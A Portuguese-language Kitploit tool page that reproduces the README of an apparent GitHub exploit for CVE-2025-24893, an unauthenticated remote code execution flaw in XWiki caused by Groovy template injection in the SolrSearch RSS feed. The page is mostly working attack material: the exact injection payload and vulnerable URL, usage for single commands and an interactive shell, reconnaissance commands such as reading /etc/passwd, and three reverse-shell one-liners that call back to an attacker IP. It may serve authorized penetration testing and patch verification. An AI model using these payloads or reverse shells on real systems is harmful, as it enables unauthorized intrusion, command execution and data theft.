Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/gotr00t0day/cve-2025-24893
ExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubgotr00t0day/cve-2025-24893

CVE-2025-24893

Execução Remota de Código Não Autenticada no XWiki via Macro SolrSearch

Ver Repositório
61há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de SSTI no XWiki

Um exploit em Python para a vulnerabilidade de Injeção de Template no Lado do Servidor (SSTI) no XWiki, via injeção de template Groovy no endpoint SolrSearch.

Vulnerabilidade

  • Tipo: Injeção de Template no Lado do Servidor (SSTI)
  • Componente: feed RSS do XWiki SolrSearch
  • Impacto: Execução Remota de Código
  • Versão Afetada: XWiki 15.10.8 (e possivelmente outras)

Requisitos

root@kitploit:~
pip3 install requests beautifulsoup4

Uso

Teste de Vulnerabilidade

root@kitploit:~
./xwiki_exploit.py -u http://target --test

Executar Comando Único

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"

Shell Interativo

root@kitploit:~
./xwiki_exploit.py -u http://target.com

Isso fornecerá um pseudo-shell interativo onde você pode executar comandos:

root@kitploit:~
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit

Modo de Depuração

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "id" --debug

Opções de Linha de Comando

  • -u, --url URL: URL alvo (obrigatório)
  • -c, --command CMD: Executar comando único
  • --test: Testar se o alvo está vulnerável
  • --no-verify-ssl: Desabilitar verificação de certificado SSL
  • --debug: Habilitar saída de depuração

Exemplos

Coleta de informações:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"

Encontrar arquivos interessantes:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"

Informações de rede:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"

Estabelecer reverse shell:

root@kitploit:~
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"

Detalhes Técnicos

Estrutura do Payload

O exploit usa a seguinte estrutura de payload SSTI:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}

Fluxo de Exploração

  1. O payload é codificado em URL e enviado ao endpoint vulnerável:

    root@kitploit:~
    /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
    
  2. O servidor processa o template Groovy e executa o comando

  3. A saída é capturada da resposta do feed RSS no formato:

    root@kitploit:~
    search on [}}OUTPUT]
    
  4. O exploit analisa a resposta HTML para extrair a saída do comando

Notas

  • Comandos são executados como o usuário xwiki (uid=997)
  • O diretório de trabalho é /usr/lib/xwiki-jetty
  • Alguns comandos podem não gerar saída se falharem ou forem executados em segundo plano
  • Para comandos complexos, considere usar scripts de shell ou codificação base64

Aviso Legal

Esta ferramenta é apenas para fins educacionais e de testes de penetração autorizados. Use-a somente em sistemas nos quais você tenha permissão para testar.

Baixar ferramenta